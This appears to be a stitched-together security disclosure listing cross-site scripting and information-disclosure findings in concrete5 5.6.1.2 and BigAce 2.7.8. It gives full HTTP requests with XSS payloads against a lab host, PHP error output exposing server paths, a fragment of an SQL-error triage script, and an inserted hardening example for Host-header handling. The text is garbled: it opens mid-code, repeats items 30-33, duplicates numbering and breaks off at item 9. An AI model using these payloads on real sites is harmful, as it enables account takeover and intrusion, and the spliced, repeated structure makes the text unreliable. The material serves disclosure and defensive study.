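        verdict = "input escaped inside a SQL literal; error message is encoded"
    else:
        verdict = "input not present in the failed statement"
    return {"sql_error": True, "code": err["code"], "context": ctx,
            "echoed_raw_in_html": echoed, "verdict": verdict}
```

Run triage(resp.text, marker) over each error page collected with the requests above; "unquoted" is the one to hand to sqlmap as in item 1, "quoted" plus echoed_raw_in_html is item 16's class of bug, and install_root(parse_php_errors(resp.text)) summarises what the PHP errors give away.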
30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142
ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---
31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---
31. xss (caveat: the tracking-code setting exists to hold raw HTML such as analytics snippets, so script in it is by design for an admin; it only matters if a user below admin can reach this form)
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87
SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---
33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210
miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---
Let me know if you have any questions.
Enjoy ;)
Host: 10.149.14.52
(...)
Connection: close
---< request >---
12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94
MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---
16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187
ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---
resp:
<div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
</div>
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314
akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---
18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971
input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
resp:
<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID=60&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html
Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206
23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html
Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24
24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
26. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
29. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html
Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205
30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142
ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---
31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---
32. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87
SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---
33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210
miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---
Let me know if you have any questions.
Enjoy ;)
[EN] BigAce 2.7.8 Multiple bugs
Last week I saw that in the latest version of BigAce CMS Yashar Shahinzadeh found a vulnerability.
I decided to check it again, and I found a few other things described below.
I. For a normal registered ('anonymous') user:
1. Escaping from the source code via the Host header:
---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---
Response:
<link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text
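The finding above works because the application copies the raw Host header into the `href` of the generated `<link>` tag. The following is an added example (not BigAce or concrete5 code, written in Python for portability) that puts that pattern next to a hardened version which only trusts allowlisted hostnames and escapes the result; `ALLOWED_HOSTS`, `FALLBACK_HOST` and all function names are assumptions, and the Host value is a shortened, constructed copy of the one in the request above.

```python
import html
import re
from urllib.parse import quote

# Constructed copy of the Host header from the request above (shortened);
# it is plain test data here and is not sent anywhere.
ATTACKER_HOST = '1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaa'

# Hypothetical allowlist: the hostnames this site is legitimately served as.
ALLOWED_HOSTS = {"10.149.14.52", "www.example.test"}
FALLBACK_HOST = "10.149.14.52"  # used when the request's Host header is not trusted

# Conservative host syntax: dotted labels of letters, digits and hyphens, with an
# optional numeric port. Quotes, slashes, '<' and '%' are rejected before the
# value gets anywhere near the markup.
_HOST_RE = re.compile(r"^(?:[A-Za-z0-9-]{1,63}\.)*[A-Za-z0-9-]{1,63}(?::\d{1,5})?$")


def build_stylesheet_link_unsafe(host_header: str, path: str) -> str:
    """The pattern behind the finding: the raw Host value is concatenated into HTML."""
    return f'<link rel="stylesheet" href="http://{host_header}{path}" type="text/css">'


def canonical_host(host_header, allowed_hosts=ALLOWED_HOSTS):
    """Return the Host value to use for absolute URLs, or None if it is not trusted.

    Two independent checks: the value must look like a hostname (syntax), and its
    hostname part must be on the allowlist (policy). A well-formed but unknown host
    is still rejected, which also blocks Host-based cache-poisoning tricks.
    """
    if not host_header:
        return None
    host = host_header.strip().lower()
    if not _HOST_RE.match(host):
        return None
    if host.rsplit(":", 1)[0] not in allowed_hosts:
        return None
    return host


def build_stylesheet_link(host_header: str, path: str) -> str:
    """Hardened version: allowlisted host, percent-encoded path, attribute-escaped href."""
    host = canonical_host(host_header) or FALLBACK_HOST
    href = "http://" + host + quote(path, safe="/")
    # html.escape is belt-and-braces: after validation and quoting the href cannot
    # contain '"', '<' or '>', but output encoding should not rely on that.
    return f'<link rel="stylesheet" href="{html.escape(href, quote=True)}" type="text/css">'


def host_reflected(host_header: str, response_body: str) -> bool:
    """The tester's check from the write-up: does the raw Host value come back verbatim?"""
    return bool(host_header) and host_header in response_body


if __name__ == "__main__":
    path = "/bigace/public/cid1/spring_flavour/style.css"
    unsafe = build_stylesheet_link_unsafe(ATTACKER_HOST, path)
    hardened = build_stylesheet_link(ATTACKER_HOST, path)
    print("unsafe  :", unsafe)
    print("hardened:", hardened)
    print("reflected (unsafe)  :", host_reflected(ATTACKER_HOST, unsafe))
    print("reflected (hardened):", host_reflected(ATTACKER_HOST, hardened))
```

The same allowlist check belongs wherever a PHP application reads `$_SERVER['HTTP_HOST']` to build absolute URLs; `host_reflected` is the quick comparison a tester runs between the request's Host value and the response body.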
II. For a logged-in editor user:
1. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52
mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---
9. xss
---< request >---
